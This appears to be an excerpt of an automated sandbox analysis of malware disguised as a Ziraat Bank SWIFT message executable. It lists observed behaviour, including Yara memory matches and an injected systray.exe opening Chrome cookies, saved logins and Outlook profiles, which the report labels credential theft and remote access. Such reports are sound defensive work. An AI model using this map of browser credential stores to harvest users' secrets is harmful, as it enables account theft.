Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\systray.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs